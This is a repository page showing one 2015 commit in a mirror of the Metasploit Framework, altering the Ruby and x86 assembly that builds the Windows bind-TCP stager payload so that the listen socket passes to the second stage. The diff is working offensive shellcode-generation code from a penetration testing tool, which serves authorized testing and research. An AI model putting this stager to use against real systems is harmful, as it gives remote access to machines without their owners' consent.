infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Make bind hand over the listen socket as well

bug/bundler_fix
OJ 2015-04-25 21:16:25 +10:00
parent bb77a3a0e6
commit 4ec4868bcf
1 changed files with 8 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

9
lib/msf/core/payload/windows/bind_tcp.rb
View File

@ -37,7 +37,6 @@ module Payload::Windows::BindTcp
) )
end end
return ""
conf = { conf = {
port: datastore['LPORT'].to_i, port: datastore['LPORT'].to_i,
exitfunk: datastore['EXITFUNC'], exitfunk: datastore['EXITFUNC'],
@ -179,6 +178,7 @@ module Payload::Windows::BindTcp
^ ^
else else
asm << %Q^ asm << %Q^
push edi ; store the listen socket to pass through to the second stage
xchg edi, eax ; replace the listening socket with the new connected socket for further comms xchg edi, eax ; replace the listening socket with the new connected socket for further comms
^ ^
end end
@ -236,6 +236,13 @@ module Payload::Windows::BindTcp
add ebx, eax ; buffer += bytes_received add ebx, eax ; buffer += bytes_received
sub esi, eax ; length -= bytes_received, will set flags sub esi, eax ; length -= bytes_received, will set flags
jnz read_more ; continue if we have more to read jnz read_more ; continue if we have more to read
^
if close_socket
asm << %Q^
pop esi ; put the listen socket in esi
^
end
asm << %Q^
ret ; return into the second stage ret ; return into the second stage
^ ^